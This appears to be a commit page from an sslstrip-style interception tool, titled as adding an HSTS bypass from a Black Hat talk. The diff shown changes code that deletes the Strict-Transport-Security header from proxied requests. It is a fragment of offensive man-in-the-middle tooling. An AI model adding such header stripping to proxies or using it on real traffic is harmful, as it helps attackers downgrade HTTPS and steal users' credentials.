added HSTS bypass as demonstrated by Leonardo Nve at blackhat

2025-07-07 21:42:17 -07:00 · 2014-10-11 13:09:06 +02:00 · 2014-10-11 13:09:06 +02:00 · 82739bba9f
commit 82739bba9f
parent 5be41cfd37
11 changed files with 765 additions and 18 deletions
--- a/sslstrip/ClientRequest.py
+++ b/sslstrip/ClientRequest.py
@ -57,10 +57,10 @@ class ClientRequest(Request):
             headers['accept-encoding'] == 'identity'
             logging.debug("Zapped encoding")

-        if 'Strict-Transport-Security' in headers: #kill new hsts requests
-            del headers['Strict-Transport-Security']
-            logging.info("Zapped a HSTS request")
-        
+        if 'strict-transport-security' in headers: #kill new hsts requests
+            del headers['strict-transport-security']
+            logging.info("Zapped HSTS header")
+
        if 'if-modified-since' in headers:
            del headers['if-modified-since']